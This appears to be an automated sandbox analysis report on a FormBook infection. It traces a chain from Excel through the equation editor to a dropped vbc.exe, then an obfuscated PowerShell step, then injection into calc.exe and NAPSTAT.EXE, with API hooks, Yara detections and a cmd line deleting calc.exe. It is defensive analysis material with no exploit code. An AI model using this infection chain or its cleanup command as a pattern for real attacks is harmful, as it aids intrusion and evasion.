Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.21
Last-Modified: Fri, 16 Jul 2021 21:41:07 GMT
ETag: "6800-5c74471fec7eb"
Accept-Ranges: bytes
Content-Length: 26624
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload


HTTPS Packets

Timestamp: Jul 22, 2021 17:18:28.819962978 CEST
Source IP: 162.159.130.233
Source Port: 443
Dest IP: 192.168.2.22
Dest Port: 49166
Subject: CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US; CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US
Issuer: CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US; CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE
Not Before: Tue Jan 19 01:00:00 CET 2021; Mon Jan 27 13:48:08 CET 2020
Not After: Wed Jan 19 00:59:59 CET 2022; Wed Jan 01 00:59:59 CET 2025
JA3 SSL Client Fingerprint: 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0
JA3 SSL Client Digest: 7dcce5b76c8b17472d024758970a406b

Code Manipulations

User Modules

Hook Summary

Function Name | Hook Type | Active in Processes
PeekMessageA | INLINE | explorer.exe
PeekMessageW | INLINE | explorer.exe
GetMessageW | INLINE | explorer.exe
GetMessageA | INLINE | explorer.exe

Processes

Process: explorer.exe, Module: USER32.dll
Function Name | Hook Type | New Data
PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x86 0x6E 0xEF
PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x8E 0xEE 0xEF
GetMessageW | INLINE | 0x48 0x8B 0xB8 0x8E 0xEE 0xEF
GetMessageA | INLINE | 0x48 0x8B 0xB8 0x86 0x6E 0xEF

Statistics

Behavior


System Behavior

General

Start time: 17:17:44
Start date: 22/07/2021
Path: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit): false
Commandline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase: 0x13f120000
File size: 27641504 bytes
MD5 hash: 5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 17:18:07
Start date: 22/07/2021
Path: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit): true
Commandline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase: 0x400000
File size: 543304 bytes
MD5 hash: A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 17:18:09
Start date: 22/07/2021
Path: C:\Users\Public\vbc.exe
Wow64 process (32bit): false
Commandline: 'C:\Users\Public\vbc.exe'
Imagebase: 0x400000
File size: 26624 bytes
MD5 hash: F5041EC4CE468A07ECBFD076BC0F879B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 20%, Metadefender
• Detection: 57%, ReversingLabs
Reputation: low

General

Start time: 17:18:10
Start date: 22/07/2021
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: Powershell [obfuscated command line omitted]
Imagebase: 0x13ffd0000
File size: 473600 bytes
MD5 hash: 852D67A27E454BD389FA7F02A8CBE23F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: high

                                                                                                                                                            General

                                                                                                                                                            Start time:17:18:37
                                                                                                                                                            Start date:22/07/2021
                                                                                                                                                            Path:C:\Windows\SysWOW64\calc.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:{path}
                                                                                                                                                            Imagebase:0xf30000
                                                                                                                                                            File size:776192 bytes
                                                                                                                                                            MD5 hash:60B7C0FEAD45F2066E5B805A91F4F0FC
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.2269086957.0000000000140000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.2269086957.0000000000140000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.2269086957.0000000000140000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.2269432200.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.2269432200.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.2269432200.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.2269237577.0000000000270000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.2269237577.0000000000270000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.2269237577.0000000000270000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                            Reputation:moderate

                                                                                                                                                            General

                                                                                                                                                            Start time:17:18:38
                                                                                                                                                            Start date:22/07/2021
                                                                                                                                                            Path:C:\Windows\explorer.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                            Imagebase:0xffca0000
                                                                                                                                                            File size:3229696 bytes
                                                                                                                                                            MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high

                                                                                                                                                            General

                                                                                                                                                            Start time:17:19:05
                                                                                                                                                            Start date:22/07/2021
                                                                                                                                                            Path:C:\Windows\SysWOW64\NAPSTAT.EXE
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:C:\Windows\SysWOW64\NAPSTAT.EXE
                                                                                                                                                            Imagebase:0xab0000
                                                                                                                                                            File size:279552 bytes
                                                                                                                                                            MD5 hash:4AF92E1821D96E4178732FC04D8FD69C
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.2364869703.0000000000830000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.2364869703.0000000000830000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.2364869703.0000000000830000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.2364447534.00000000000C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.2364447534.00000000000C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.2364447534.00000000000C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.2364843590.0000000000800000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.2364843590.0000000000800000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.2364843590.0000000000800000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                            Reputation:moderate

                                                                                                                                                            General

                                                                                                                                                            Start time:17:19:06
                                                                                                                                                            Start date:22/07/2021
                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:/c del 'C:\WINDOWS\syswow64\calc.exe'
                                                                                                                                                            Imagebase:0x4a5f0000
                                                                                                                                                            File size:302592 bytes
                                                                                                                                                            MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high
